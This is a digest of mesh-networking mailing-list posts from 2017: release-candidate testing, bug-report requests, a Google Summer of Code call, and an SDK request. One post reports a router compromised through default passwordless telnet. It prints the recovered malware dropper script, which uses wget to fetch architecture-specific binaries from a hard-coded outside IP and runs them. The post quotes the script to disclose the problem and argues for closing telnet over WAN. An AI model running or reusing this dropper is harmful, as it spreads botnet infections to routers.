The first release candidate for LEDE 17.01.0 is out:
https://downloads.lede-project.org/releases/
-------- Forwarded Message --------
Subject: [LEDE-DEV] Release Candidate Test Plan - first draft
Date: Mon, 30 Jan 2017 15:14:08 -0500
From: Rich Brown <richb.hanover(a)gmail.com>
To: LEDE Development List <lede-dev(a)lists.infradead.org>
Folks,
There have been a couple questions on the forum about what needs to be
tested in the LEDE release candidate.
I put together a draft of a note that lists how to install, what to
test, and how to report problems. It's at:
https://lede-project.org/playground/releasecandidatetestplan
Comments, updates, etc. welcomed.
Rich
_______________________________________________
Lede-dev mailing list
Lede-dev(a)lists.infradead.org
http://lists.infradead.org/mailman/listinfo/lede-dev
Hi Everyone,
I'm the new mantainer of Libremesh's Chef tool:
http://chef.altermundi.net/
I'm hunting down issues, so if you had any issue in the past with this
tool it would be awesome to have it reported.
You can do it by filling an issue report on Github here:
https://github.com/libremesh/alterchef/issues/new
Or you can send an email to this list or directly to me at:
nico+chef(a)libre.ws
Hope knowing about your issues/feature requests soon!
Hi!
Please read the forwarded email if you don't know what a GSoC is.
Everybody can participate as mentor (rewarded 500$) and anyone in a
university (from undergraduate to PhD) can participate as student
(should be rewarded 5k$).
The deadline for proposing ideas (find link below) is the end of this week.
We can propose ideas on implementation of lime-proto-client, support
for WPA in AP-client setup, multi-ap + WPA + QOS for prioritizing node
owner's traffic, improvement of LiMe-LUCI web interface (very
important), make easy the setup of captive portal with nodogsplash...
---------- Forwarded message ----------
From: Andreas Bräu <ab(a)andi95.de>
Date: 2017-01-15 20:56 GMT+01:00
Subject: Re: [Battlemesh] Google Summer of Code 2017 is coming
To: battlemesh(a)ml.ninux.org
Hi,
please keep in mind to add your ideas as soon as possible, not later
than by the end of the week to our wiki: https://wiki.freifunk.net/Ideas
Then the appication period will start.
Best regards,
Andi
Am 01.01.2017 um 16:49 schrieb Andreas Bräu:
> Hi there,
>
> I wish you a happy new year! New year, new GSoC! :)
>
> We're planning to apply again as organisation for GSoC 2017. As last
> year we want to be an umbrella organisation for wireless communities.
> More information on GSoC you can find at
> https://en.wikipedia.org/wiki/Google_Summer_of_Code
>
> Google announced the new program in October. The period to apply as
> organisation will start on January 19 and will close on February 9:
> https://developers.google.com/open-source/gsoc/timeline
>
> As every year we need your ideas for possible projects. These ideas are
> one of the most important parts of our application. They are also source
> for students to develop their project proposals. Please add your ideas
> to our wiki page at https://wiki.freifunk.net/Ideas Our ideas from last
> year I copied to https://wiki.freifunk.net/Ideas_GSoC_2016
>
> We're also looking for people helping us in administration. If you're
> interested in supporting us, send us a message.
>
> Please spread this to your communities, so we can get a great
> collections of ideas! If you know of other wireless communities, please
> inform them, too.
>
> Best regards,
>
> Andi
>
> _______________________________________________
> Battlemesh mailing list
> Battlemesh(a)ml.ninux.org
> http://ml.ninux.org/mailman/listinfo/battlemesh
So, i just flashed a generic Community Chaos taken from
http://downloads.libremesh.org/community_chaos/16.07/ar71xx/generic/
on a device that gets a public ipv4 over WAN
went in via telnet, configured some bits, but i felt it was a bit
unresponsive. checking loadavg with "uptime":
12:00:25 up 17 min, load average: 3.70, 1.36, 0.53
and logread showed some OOM... suspicious
i had been infected already with some malware :(
found a process "LA4obRtMROA7TAt2wWN1TnwHw"
and a file in the root directory: /bin.sh
which i copy at the end of this email for reference.
so funny, for a moment i felt a deja-vu like the many times i connected
a Windows PC directly to a public IP, and in under 5 minutes it had been
infected with viruses.
(this LiMe was infected in under 15 minutes as well)
It most likely came in via telnet, since that's open and passwordless
by default on our releases.
I think we should at least block telnet port over WAN by default
##########################
#!/bin/sh
BIN_NAMES="mips mpsl arm arm7 ppc spc m68k sh4"
HTTP_SERVER="95.215.62.11"
HTTP_PORT=80
DROPPER_FILE_NAME="dvrAssist"
for a in $BIN_NAMES
do
if [ -f "/bin/chmod" ]
then
rm $DROPPER_FILE_NAME
/bin/busybox wget http://$HTTP_SERVER:$HTTP_PORT/bins/$a
-O - > $DROPPER_FILE_NAME
chmod 777 $DROPPER_FILE_NAME
./$DROPPER_FILE_NAME
>$DROPPER_FILE_NAME
else
rm $DROPPER_FILE_NAME
cp /bin/echo $DROPPER_FILE_NAME
>$DROPPER_FILE_NAME
/bin/busybox wget http://$HTTP_SERVER:$HTTP_PORT/bins/$a
-O - > $DROPPER_FILE_NAME
./$DROPPER_FILE_NAME
>$DROPPER_FILE_NAME
fi
done
echo infectfgt
after a short talk between daniel and ufo in the leipzig xmpp muc about
libremesh i thought "lets give lime another shot". unfortunately there
is no sdk available for download. :( hopefully the sdk was packaged
while building the release and someone could upload it.
i need the sdk to get an older batman-adv version for compatibility with
the existing mesh.
greetings from jena,
micha